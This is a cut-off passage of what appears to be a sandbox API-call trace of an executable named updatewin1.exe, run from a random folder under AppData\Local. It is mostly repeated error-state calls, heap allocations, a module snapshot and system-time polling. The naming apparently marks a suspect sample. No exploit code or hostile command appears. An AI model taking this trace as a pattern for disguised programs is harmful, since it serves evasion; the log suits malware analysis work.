\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿµæ…}\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0111.215] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x43a580, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5\\updatewin1.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5\\updatewin1.exe")) returned 0x5f [0111.215] GetLastError () returned 0x0 [0111.215] SetLastError (dwErrCode=0x0) [0111.215] GetLastError () returned 0x0 [0111.215] SetLastError (dwErrCode=0x0) [0111.215] GetLastError () returned 0x0 [0111.215] SetLastError (dwErrCode=0x0) [0111.215] GetLastError () returned 0x0 [0111.215] SetLastError (dwErrCode=0x0) [0111.215] GetLastError () returned 0x0 [0111.215] SetLastError (dwErrCode=0x0) [0111.215] GetLastError () returned 0x0 [0111.216] SetLastError (dwErrCode=0x0) [0111.216] GetLastError () returned 0x0 [0111.216] SetLastError (dwErrCode=0x0) [0111.216] GetLastError () returned 0x0 [0111.216] SetLastError (dwErrCode=0x0) [0111.216] GetLastError () returned 0x0 [0111.216] SetLastError (dwErrCode=0x0) [0111.216] GetLastError () returned 0x0 [0111.216] SetLastError (dwErrCode=0x0) [0111.216] GetLastError () returned 0x0 [0111.216] SetLastError (dwErrCode=0x0) [0111.216] GetLastError () returned 0x0 [0111.216] SetLastError (dwErrCode=0x0) [0111.216] GetLastError () returned 0x0 [0111.216] SetLastError (dwErrCode=0x0) [0111.216] GetLastError () returned 0x0 [0111.217] SetLastError (dwErrCode=0x0) [0111.217] GetLastError () returned 0x0 [0111.217] SetLastError (dwErrCode=0x0) [0111.217] GetLastError () returned 0x0 [0111.217] SetLastError (dwErrCode=0x0) [0111.217] GetLastError () returned 0x0 [0111.217] SetLastError (dwErrCode=0x0) [0111.217] GetLastError () returned 0x0 [0111.217] SetLastError (dwErrCode=0x0) [0111.217] GetLastError () returned 0x0 [0111.217] SetLastError (dwErrCode=0x0) [0111.217] GetLastError () returned 0x0 [0111.217] SetLastError (dwErrCode=0x0) [0111.217] GetLastError () returned 0x0 [0111.217] SetLastError (dwErrCode=0x0) [0111.217] GetLastError () returned 0x0 [0111.217] SetLastError (dwErrCode=0x0) [0111.217] GetLastError () returned 0x0 [0111.218] SetLastError (dwErrCode=0x0) [0111.218] GetLastError () returned 0x0 [0111.218] SetLastError (dwErrCode=0x0) [0111.218] GetLastError () returned 0x0 [0111.218] SetLastError (dwErrCode=0x0) [0111.218] GetLastError () returned 0x0 [0111.218] SetLastError (dwErrCode=0x0) [0111.218] GetLastError () returned 0x0 [0111.218] SetLastError (dwErrCode=0x0) [0111.218] GetLastError () returned 0x0 [0111.218] SetLastError (dwErrCode=0x0) [0111.218] GetLastError () returned 0x0 [0111.218] SetLastError (dwErrCode=0x0) [0111.218] GetLastError () returned 0x0 [0111.218] SetLastError (dwErrCode=0x0) [0111.218] GetLastError () returned 0x0 [0111.218] SetLastError (dwErrCode=0x0) [0111.218] GetLastError () returned 0x0 [0111.219] SetLastError (dwErrCode=0x0) [0111.219] GetLastError () returned 0x0 [0111.219] SetLastError (dwErrCode=0x0) [0111.219] GetLastError () returned 0x0 [0111.219] SetLastError (dwErrCode=0x0) [0111.219] GetLastError () returned 0x0 [0111.219] SetLastError (dwErrCode=0x0) [0111.240] GetLastError () returned 0x0 [0111.240] SetLastError (dwErrCode=0x0) [0111.240] GetLastError () returned 0x0 [0111.240] SetLastError (dwErrCode=0x0) [0111.240] GetLastError () returned 0x0 [0111.240] SetLastError (dwErrCode=0x0) [0111.240] GetLastError () returned 0x0 [0111.240] SetLastError (dwErrCode=0x0) [0111.240] GetLastError () returned 0x0 [0111.240] SetLastError (dwErrCode=0x0) [0111.240] GetLastError () returned 0x0 [0111.240] SetLastError (dwErrCode=0x0) [0111.240] GetLastError () returned 0x0 [0111.240] SetLastError (dwErrCode=0x0) [0111.240] GetLastError () returned 0x0 [0111.241] SetLastError (dwErrCode=0x0) [0111.241] GetLastError () returned 0x0 [0111.241] SetLastError (dwErrCode=0x0) [0111.241] GetLastError () returned 0x0 [0111.241] SetLastError (dwErrCode=0x0) [0111.241] GetLastError () returned 0x0 [0111.241] SetLastError (dwErrCode=0x0) [0111.241] GetLastError () returned 0x0 [0111.241] SetLastError (dwErrCode=0x0) [0111.241] GetLastError () returned 0x0 [0111.241] SetLastError (dwErrCode=0x0) [0111.241] GetLastError () returned 0x0 [0111.241] SetLastError (dwErrCode=0x0) [0111.241] GetLastError () returned 0x0 [0111.241] SetLastError (dwErrCode=0x0) [0111.241] GetLastError () returned 0x0 [0111.242] SetLastError (dwErrCode=0x0) [0111.242] GetLastError () returned 0x0 [0111.242] SetLastError (dwErrCode=0x0) [0111.242] GetLastError () returned 0x0 [0111.242] SetLastError (dwErrCode=0x0) [0111.242] GetLastError () returned 0x0 [0111.242] SetLastError (dwErrCode=0x0) [0111.242] GetLastError () returned 0x0 [0111.242] SetLastError (dwErrCode=0x0) [0111.242] GetLastError () returned 0x0 [0111.242] SetLastError (dwErrCode=0x0) [0111.242] GetLastError () returned 0x0 [0111.242] SetLastError (dwErrCode=0x0) [0111.242] GetLastError () returned 0x0 [0111.242] SetLastError (dwErrCode=0x0) [0111.242] GetLastError () returned 0x0 [0111.242] SetLastError (dwErrCode=0x0) [0111.242] GetLastError () returned 0x0 [0111.243] SetLastError (dwErrCode=0x0) [0111.243] GetLastError () returned 0x0 [0111.243] SetLastError (dwErrCode=0x0) [0111.243] GetLastError () returned 0x0 [0111.243] SetLastError (dwErrCode=0x0) [0111.243] GetLastError () returned 0x0 [0111.243] SetLastError (dwErrCode=0x0) [0111.243] GetLastError () returned 0x0 [0111.243] SetLastError (dwErrCode=0x0) [0111.243] GetLastError () returned 0x0 [0111.243] SetLastError (dwErrCode=0x0) [0111.243] GetLastError () returned 0x0 [0111.243] SetLastError (dwErrCode=0x0) [0111.243] GetLastError () returned 0x0 [0111.243] SetLastError (dwErrCode=0x0) [0111.243] GetLastError () returned 0x0 [0111.244] SetLastError (dwErrCode=0x0) [0111.244] GetLastError () returned 0x0 [0111.244] SetLastError (dwErrCode=0x0) [0111.244] GetLastError () returned 0x0 [0111.244] SetLastError (dwErrCode=0x0) [0111.244] GetLastError () returned 0x0 [0111.244] SetLastError (dwErrCode=0x0) [0111.244] GetLastError () returned 0x0 [0111.244] SetLastError (dwErrCode=0x0) [0111.244] GetLastError () returned 0x0 [0111.244] SetLastError (dwErrCode=0x0) [0111.244] GetLastError () returned 0x0 [0111.244] SetLastError (dwErrCode=0x0) [0111.244] GetLastError () returned 0x0 [0111.244] SetLastError (dwErrCode=0x0) [0111.244] GetLastError () returned 0x0 [0111.245] SetLastError (dwErrCode=0x0) [0111.245] GetLastError () returned 0x0 [0111.245] SetLastError (dwErrCode=0x0) [0111.245] GetLastError () returned 0x0 [0111.245] SetLastError (dwErrCode=0x0) [0111.245] GetLastError () returned 0x0 [0111.245] SetLastError (dwErrCode=0x0) [0111.245] GetLastError () returned 0x0 [0111.245] SetLastError (dwErrCode=0x0) [0111.245] GetLastError () returned 0x0 [0111.245] SetLastError (dwErrCode=0x0) [0111.245] GetLastError () returned 0x0 [0111.245] SetLastError (dwErrCode=0x0) [0111.245] GetLastError () returned 0x0 [0111.245] SetLastError (dwErrCode=0x0) [0111.245] GetLastError () returned 0x0 [0111.246] SetLastError (dwErrCode=0x0) [0111.246] GetLastError () returned 0x0 [0111.246] SetLastError (dwErrCode=0x0) [0111.246] GetLastError () returned 0x0 [0111.246] SetLastError (dwErrCode=0x0) [0111.246] GetLastError () returned 0x0 [0111.246] SetLastError (dwErrCode=0x0) [0111.246] GetLastError () returned 0x0 [0111.246] SetLastError (dwErrCode=0x0) [0111.246] GetLastError () returned 0x0 [0111.246] SetLastError (dwErrCode=0x0) [0111.246] GetLastError () returned 0x0 [0111.246] SetLastError (dwErrCode=0x0) [0111.246] GetLastError () returned 0x0 [0111.246] SetLastError (dwErrCode=0x0) [0111.246] GetLastError () returned 0x0 [0111.246] SetLastError (dwErrCode=0x0) [0111.247] GetLastError () returned 0x0 [0111.247] SetLastError (dwErrCode=0x0) [0111.247] GetLastError () returned 0x0 [0111.247] SetLastError (dwErrCode=0x0) [0111.247] GetLastError () returned 0x0 [0111.247] SetLastError (dwErrCode=0x0) [0111.247] GetLastError () returned 0x0 [0111.247] SetLastError (dwErrCode=0x0) [0111.247] RtlAllocateHeap (HeapHandle=0x1f10000, Flags=0x0, Size=0x68) returned 0x1f11990 [0111.247] GetLastError () returned 0x0 [0111.247] SetLastError (dwErrCode=0x0) [0111.247] GetLastError () returned 0x0 [0111.247] SetLastError (dwErrCode=0x0) [0111.247] GetLastError () returned 0x0 [0111.247] SetLastError (dwErrCode=0x0) [0111.247] GetLastError () returned 0x0 [0111.248] SetLastError (dwErrCode=0x0) [0111.248] GetLastError () returned 0x0 [0111.248] SetLastError (dwErrCode=0x0) [0111.248] GetLastError () returned 0x0 [0111.248] SetLastError (dwErrCode=0x0) [0111.248] GetLastError () returned 0x0 [0111.248] SetLastError (dwErrCode=0x0) [0111.248] GetLastError () returned 0x0 [0111.248] SetLastError (dwErrCode=0x0) [0111.248] GetLastError () returned 0x0 [0111.248] SetLastError (dwErrCode=0x0) [0111.248] GetLastError () returned 0x0 [0111.248] SetLastError (dwErrCode=0x0) [0111.248] GetLastError () returned 0x0 [0111.248] SetLastError (dwErrCode=0x0) [0111.248] GetLastError () returned 0x0 [0111.248] SetLastError (dwErrCode=0x0) [0111.248] GetLastError () returned 0x0 [0111.249] SetLastError (dwErrCode=0x0) [0111.249] GetLastError () returned 0x0 [0111.249] SetLastError (dwErrCode=0x0) [0111.249] GetLastError () returned 0x0 [0111.249] SetLastError (dwErrCode=0x0) [0111.249] GetLastError () returned 0x0 [0111.249] SetLastError (dwErrCode=0x0) [0111.249] GetLastError () returned 0x0 [0111.249] SetLastError (dwErrCode=0x0) [0111.249] GetLastError () returned 0x0 [0111.249] SetLastError (dwErrCode=0x0) [0111.249] GetLastError () returned 0x0 [0111.249] SetLastError (dwErrCode=0x0) [0111.249] GetLastError () returned 0x0 [0111.249] SetLastError (dwErrCode=0x0) [0111.249] GetLastError () returned 0x0 [0111.249] SetLastError (dwErrCode=0x0) [0111.249] GetLastError () returned 0x0 [0111.250] SetLastError (dwErrCode=0x0) [0111.250] GetLastError () returned 0x0 [0111.250] SetLastError (dwErrCode=0x0) [0111.250] GetLastError () returned 0x0 [0111.250] SetLastError (dwErrCode=0x0) [0111.250] GetLastError () returned 0x0 [0111.250] SetLastError (dwErrCode=0x0) [0111.250] GetLastError () returned 0x0 [0111.250] SetLastError (dwErrCode=0x0) [0111.250] GetLastError () returned 0x0 [0111.250] SetLastError (dwErrCode=0x0) [0111.250] GetLastError () returned 0x0 [0111.250] SetLastError (dwErrCode=0x0) [0111.250] GetLastError () returned 0x0 [0111.251] SetLastError (dwErrCode=0x0) [0111.251] GetLastError () returned 0x0 [0111.251] SetLastError (dwErrCode=0x0) [0111.251] GetLastError () returned 0x0 [0111.251] SetLastError (dwErrCode=0x0) [0111.251] GetLastError () returned 0x0 [0111.251] SetLastError (dwErrCode=0x0) [0111.251] GetLastError () returned 0x0 [0111.251] SetLastError (dwErrCode=0x0) [0111.251] GetLastError () returned 0x0 [0111.251] SetLastError (dwErrCode=0x0) [0111.251] GetLastError () returned 0x0 [0111.251] SetLastError (dwErrCode=0x0) [0111.251] GetLastError () returned 0x0 [0111.251] SetLastError (dwErrCode=0x0) [0111.251] GetLastError () returned 0x0 [0111.251] SetLastError (dwErrCode=0x0) [0111.251] GetLastError () returned 0x0 [0111.252] SetLastError (dwErrCode=0x0) [0111.252] GetLastError () returned 0x0 [0111.252] SetLastError (dwErrCode=0x0) [0111.252] GetLastError () returned 0x0 [0111.252] SetLastError (dwErrCode=0x0) [0111.252] GetLastError () returned 0x0 [0111.252] SetLastError (dwErrCode=0x0) [0111.252] GetLastError () returned 0x0 [0111.252] SetLastError (dwErrCode=0x0) [0111.252] GetLastError () returned 0x0 [0111.252] SetLastError (dwErrCode=0x0) [0111.252] GetLastError () returned 0x0 [0111.252] SetLastError (dwErrCode=0x0) [0111.252] GetLastError () returned 0x0 [0111.252] SetLastError (dwErrCode=0x0) [0111.252] GetLastError () returned 0x0 [0111.252] SetLastError (dwErrCode=0x0) [0111.252] GetLastError () returned 0x0 [0111.253] SetLastError (dwErrCode=0x0) [0111.253] GetLastError () returned 0x0 [0111.253] SetLastError (dwErrCode=0x0) [0111.253] GetLastError () returned 0x0 [0111.253] SetLastError (dwErrCode=0x0) [0111.253] GetLastError () returned 0x0 [0111.253] SetLastError (dwErrCode=0x0) [0111.253] GetLastError () returned 0x0 [0111.253] SetLastError (dwErrCode=0x0) [0111.253] GetLastError () returned 0x0 [0111.253] SetLastError (dwErrCode=0x0) [0111.253] GetLastError () returned 0x0 [0111.253] SetLastError (dwErrCode=0x0) [0111.253] GetLastError () returned 0x0 [0111.253] SetLastError (dwErrCode=0x0) [0111.253] GetLastError () returned 0x0 [0111.253] SetLastError (dwErrCode=0x0) [0111.253] GetLastError () returned 0x0 [0111.254] SetLastError (dwErrCode=0x0) [0111.254] GetLastError () returned 0x0 [0111.254] SetLastError (dwErrCode=0x0) [0111.254] GetLastError () returned 0x0 [0111.254] SetLastError (dwErrCode=0x0) [0111.254] GetLastError () returned 0x0 [0111.254] SetLastError (dwErrCode=0x0) [0111.254] GetLastError () returned 0x0 [0111.254] SetLastError (dwErrCode=0x0) [0111.254] GetLastError () returned 0x0 [0111.254] SetLastError (dwErrCode=0x0) [0111.254] GetLastError () returned 0x0 [0111.254] SetLastError (dwErrCode=0x0) [0111.254] GetLastError () returned 0x0 [0111.254] SetLastError (dwErrCode=0x0) [0111.254] GetLastError () returned 0x0 [0111.254] SetLastError (dwErrCode=0x0) [0111.254] GetLastError () returned 0x0 [0111.254] SetLastError (dwErrCode=0x0) [0111.254] GetLastError () returned 0x0 [0111.255] SetLastError (dwErrCode=0x0) [0111.255] GetLastError () returned 0x0 [0111.255] SetLastError (dwErrCode=0x0) [0111.255] GetLastError () returned 0x0 [0111.255] SetLastError (dwErrCode=0x0) [0111.255] GetLastError () returned 0x0 [0111.255] SetLastError (dwErrCode=0x0) [0111.255] GetLastError () returned 0x0 [0111.255] SetLastError (dwErrCode=0x0) [0111.255] GetLastError () returned 0x0 [0111.255] SetLastError (dwErrCode=0x0) [0111.255] GetLastError () returned 0x0 [0111.255] SetLastError (dwErrCode=0x0) [0111.255] GetLastError () returned 0x0 [0111.255] SetLastError (dwErrCode=0x0) [0111.255] GetLastError () returned 0x0 [0111.255] SetLastError (dwErrCode=0x0) [0111.255] GetLastError () returned 0x0 [0111.255] SetLastError (dwErrCode=0x0) [0111.256] GetLastError () returned 0x0 [0111.256] SetLastError (dwErrCode=0x0) [0111.256] GetLastError () returned 0x0 [0111.256] SetLastError (dwErrCode=0x0) [0111.256] GetLastError () returned 0x0 [0111.256] SetLastError (dwErrCode=0x0) [0111.256] GetLastError () returned 0x0 [0111.256] SetLastError (dwErrCode=0x0) [0111.256] GetLastError () returned 0x0 [0111.256] SetLastError (dwErrCode=0x0) [0111.256] GetLastError () returned 0x0 [0111.256] SetLastError (dwErrCode=0x0) [0111.256] GetLastError () returned 0x0 [0111.256] SetLastError (dwErrCode=0x0) [0111.257] GetLastError () returned 0x0 [0111.257] SetLastError (dwErrCode=0x0) [0111.257] GetLastError () returned 0x0 [0111.257] SetLastError (dwErrCode=0x0) [0111.257] GetLastError () returned 0x0 [0111.257] SetLastError (dwErrCode=0x0) [0111.257] GetLastError () returned 0x0 [0111.257] SetLastError (dwErrCode=0x0) [0111.257] GetLastError () returned 0x0 [0111.257] SetLastError (dwErrCode=0x0) [0111.258] GetLastError () returned 0x0 [0111.258] SetLastError (dwErrCode=0x0) [0111.258] GetLastError () returned 0x0 [0111.258] SetLastError (dwErrCode=0x0) [0111.258] GetLastError () returned 0x0 [0111.258] SetLastError (dwErrCode=0x0) [0111.258] GetLastError () returned 0x0 [0111.258] SetLastError (dwErrCode=0x0) [0111.258] GetLastError () returned 0x0 [0111.258] SetLastError (dwErrCode=0x0) [0111.258] GetLastError () returned 0x0 [0111.258] SetLastError (dwErrCode=0x0) [0111.259] GetLastError () returned 0x0 [0111.259] SetLastError (dwErrCode=0x0) [0111.259] GetLastError () returned 0x0 [0111.259] SetLastError (dwErrCode=0x0) [0111.259] GetLastError () returned 0x0 [0111.259] SetLastError (dwErrCode=0x0) [0111.259] RtlAllocateHeap (HeapHandle=0x1f10000, Flags=0x8, Size=0x98) returned 0x1f11a00 [0111.259] RtlAllocateHeap (HeapHandle=0x1f10000, Flags=0x8, Size=0x1f) returned 0x1f11aa0 [0111.259] RtlAllocateHeap (HeapHandle=0x1f10000, Flags=0x8, Size=0x36) returned 0x1f11ac8 [0111.259] RtlAllocateHeap (HeapHandle=0x1f10000, Flags=0x8, Size=0x37) returned 0x1f11b08 [0111.259] RtlAllocateHeap (HeapHandle=0x1f10000, Flags=0x8, Size=0x3c) returned 0x1f11b48 [0111.259] RtlAllocateHeap (HeapHandle=0x1f10000, Flags=0x8, Size=0x31) returned 0x1f11b90 [0111.259] RtlAllocateHeap (HeapHandle=0x1f10000, Flags=0x8, Size=0x17) returned 0x1f11bd0 [0111.259] RtlAllocateHeap (HeapHandle=0x1f10000, Flags=0x8, Size=0x24) returned 0x1f11bf0 [0111.259] RtlAllocateHeap (HeapHandle=0x1f10000, Flags=0x8, Size=0x14) returned 0x1f11c20 [0111.259] RtlAllocateHeap (HeapHandle=0x1f10000, Flags=0x8, Size=0xd) returned 0x1f11c40 [0111.259] RtlAllocateHeap (HeapHandle=0x1f10000, Flags=0x8, Size=0x25) returned 0x1f11c58 [0111.259] RtlAllocateHeap (HeapHandle=0x1f10000, Flags=0x8, Size=0x39) returned 0x1f11c88 [0111.259] RtlAllocateHeap (HeapHandle=0x1f10000, Flags=0x8, Size=0x18) returned 0x1f11cd0 [0111.259] RtlAllocateHeap (HeapHandle=0x1f10000, Flags=0x8, Size=0x17) returned 0x1f11cf0 [0111.259] RtlAllocateHeap (HeapHandle=0x1f10000, Flags=0x8, Size=0xe) returned 0x1f11d10 [0111.259] RtlAllocateHeap (HeapHandle=0x1f10000, Flags=0x8, Size=0x69) returned 0x1f11d28 [0111.259] RtlAllocateHeap (HeapHandle=0x1f10000, Flags=0x8, Size=0x3e) returned 0x1f11da0 [0111.260] RtlAllocateHeap (HeapHandle=0x1f10000, Flags=0x8, Size=0x1b) returned 0x1f11de8 [0111.260] RtlAllocateHeap (HeapHandle=0x1f10000, Flags=0x8, Size=0x1d) returned 0x1f11e10 [0111.260] RtlAllocateHeap (HeapHandle=0x1f10000, Flags=0x8, Size=0x48) returned 0x1f11e38 [0111.260] RtlAllocateHeap (HeapHandle=0x1f10000, Flags=0x8, Size=0x12) returned 0x1f11e88 [0111.260] RtlAllocateHeap (HeapHandle=0x1f10000, Flags=0x8, Size=0x18) returned 0x1f11ea8 [0111.260] RtlAllocateHeap (HeapHandle=0x1f10000, Flags=0x8, Size=0x1b) returned 0x1f11ec8 [0111.260] RtlAllocateHeap (HeapHandle=0x1f10000, Flags=0x8, Size=0x24) returned 0x1f11ef0 [0111.260] RtlAllocateHeap (HeapHandle=0x1f10000, Flags=0x8, Size=0x29) returned 0x1f11f20 [0111.260] RtlAllocateHeap (HeapHandle=0x1f10000, Flags=0x8, Size=0x1e) returned 0x1f11f58 [0111.260] RtlAllocateHeap (HeapHandle=0x1f10000, Flags=0x8, Size=0x41) returned 0x1f11f80 [0111.260] RtlAllocateHeap (HeapHandle=0x1f10000, Flags=0x8, Size=0x17) returned 0x1f11fd0 [0111.260] RtlAllocateHeap (HeapHandle=0x1f10000, Flags=0x8, Size=0xf) returned 0x1f11ff0 [0111.260] RtlAllocateHeap (HeapHandle=0x1f10000, Flags=0x8, Size=0x16) returned 0x1f12008 [0111.260] RtlAllocateHeap (HeapHandle=0x1f10000, Flags=0x8, Size=0x2a) returned 0x1f12028 [0111.260] RtlAllocateHeap (HeapHandle=0x1f10000, Flags=0x8, Size=0x29) returned 0x1f12060 [0111.260] RtlAllocateHeap (HeapHandle=0x1f10000, Flags=0x8, Size=0x15) returned 0x1f12098 [0111.260] RtlAllocateHeap (HeapHandle=0x1f10000, Flags=0x8, Size=0x1e) returned 0x1f120b8 [0111.260] RtlAllocateHeap (HeapHandle=0x1f10000, Flags=0x8, Size=0x2a) returned 0x1f120e0 [0111.260] RtlAllocateHeap (HeapHandle=0x1f10000, Flags=0x8, Size=0x12) returned 0x1f12118 [0111.260] RtlAllocateHeap (HeapHandle=0x1f10000, Flags=0x8, Size=0x18) returned 0x1f12138 [0111.260] RtlAllocateHeap (HeapHandle=0x1f10000, Flags=0x8, Size=0x46) returned 0x1f12158 [0111.260] HeapFree (in: hHeap=0x1f10000, dwFlags=0x0, lpMem=0x1f111f8 | out: hHeap=0x1f10000) returned 1 [0111.262] RtlAllocateHeap (HeapHandle=0x1f10000, Flags=0x8, Size=0x800) returned 0x1f121a8 [0111.262] RtlAllocateHeap (HeapHandle=0x1f10000, Flags=0x8, Size=0x80) returned 0x1f111f8 [0111.262] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x404e59) returned 0x0 [0111.263] RtlSizeHeap (HeapHandle=0x1f10000, Flags=0x0, MemoryPointer=0x1f111f8) returned 0x80 [0111.263] GetLastError () returned 0x0 [0111.263] SetLastError (dwErrCode=0x0) [0111.263] GetLastError () returned 0x0 [0111.263] SetLastError (dwErrCode=0x0) [0111.263] GetLastError () returned 0x0 [0111.263] SetLastError (dwErrCode=0x0) [0111.263] GetLastError () returned 0x0 [0111.263] SetLastError (dwErrCode=0x0) [0111.263] GetLastError () returned 0x0 [0111.264] SetLastError (dwErrCode=0x0) [0111.264] GetLastError () returned 0x0 [0111.264] SetLastError (dwErrCode=0x0) [0111.264] GetLastError () returned 0x0 [0111.264] SetLastError (dwErrCode=0x0) [0111.264] GetLastError () returned 0x0 [0111.264] SetLastError (dwErrCode=0x0) [0111.264] GetLastError () returned 0x0 [0111.264] SetLastError (dwErrCode=0x0) [0111.264] GetLastError () returned 0x0 [0111.264] SetLastError (dwErrCode=0x0) [0111.264] GetLastError () returned 0x0 [0111.264] SetLastError (dwErrCode=0x0) [0111.264] GetLastError () returned 0x0 [0111.264] SetLastError (dwErrCode=0x0) [0111.264] GetLastError () returned 0x0 [0111.264] SetLastError (dwErrCode=0x0) [0111.264] GetLastError () returned 0x0 [0111.265] SetLastError (dwErrCode=0x0) [0111.265] GetLastError () returned 0x0 [0111.265] SetLastError (dwErrCode=0x0) [0111.265] GetLastError () returned 0x0 [0111.265] SetLastError (dwErrCode=0x0) [0111.265] GetLastError () returned 0x0 [0111.265] SetLastError (dwErrCode=0x0) [0111.265] GetLastError () returned 0x0 [0111.265] SetLastError (dwErrCode=0x0) [0111.265] GetLastError () returned 0x0 [0111.265] SetLastError (dwErrCode=0x0) [0111.265] GetLastError () returned 0x0 [0111.265] SetLastError (dwErrCode=0x0) [0111.265] GetLastError () returned 0x0 [0111.265] SetLastError (dwErrCode=0x0) [0111.265] GetLastError () returned 0x0 [0111.265] SetLastError (dwErrCode=0x0) [0111.265] GetLastError () returned 0x0 [0111.266] SetLastError (dwErrCode=0x0) [0111.266] GetLastError () returned 0x0 [0111.266] SetLastError (dwErrCode=0x0) [0111.266] GetLastError () returned 0x0 [0111.266] SetLastError (dwErrCode=0x0) [0111.266] GetLastError () returned 0x0 [0111.266] SetLastError (dwErrCode=0x0) [0111.266] GetLastError () returned 0x0 [0111.266] SetLastError (dwErrCode=0x0) [0111.266] GetLastError () returned 0x0 [0111.266] SetLastError (dwErrCode=0x0) [0111.266] GetLastError () returned 0x0 [0111.266] SetLastError (dwErrCode=0x0) [0111.266] GetLastError () returned 0x0 [0111.266] SetLastError (dwErrCode=0x0) [0111.266] GetLastError () returned 0x0 [0111.266] SetLastError (dwErrCode=0x0) [0111.266] GetLastError () returned 0x0 [0111.266] SetLastError (dwErrCode=0x0) [0111.266] GetLastError () returned 0x0 [0111.267] SetLastError (dwErrCode=0x0) [0111.267] GetLastError () returned 0x0 [0111.267] SetLastError (dwErrCode=0x0) [0111.267] GetLastError () returned 0x0 [0111.267] SetLastError (dwErrCode=0x0) [0111.267] GetLastError () returned 0x0 [0111.267] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0111.267] GetProcAddress (hModule=0x76d30000, lpProcName="CreateToolhelp32Snapshot") returned 0x76d6735f [0111.267] GetProcAddress (hModule=0x76d30000, lpProcName="Module32FirstW") returned 0x76d679f9 [0111.267] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x78 [0111.269] Module32FirstW (hSnapshot=0x78, lpme=0x18fac8) returned 0 [0111.270] PeekMessageA (in: lpMsg=0x18fa24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x18fa24) returned 0 [0111.270] GetTickCount () returned 0x114cf22 [0111.270] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.270] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.270] GetACP () returned 0x4e4 [0111.270] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.270] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.270] GetACP () returned 0x4e4 [0111.270] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.270] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.270] GetACP () returned 0x4e4 [0111.270] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.270] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.270] GetACP () returned 0x4e4 [0111.270] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.270] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.270] GetACP () returned 0x4e4 [0111.270] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.271] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.271] GetACP () returned 0x4e4 [0111.271] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0111.271] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0111.271] GetACP () returned 0x4e4 [0111.271] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, 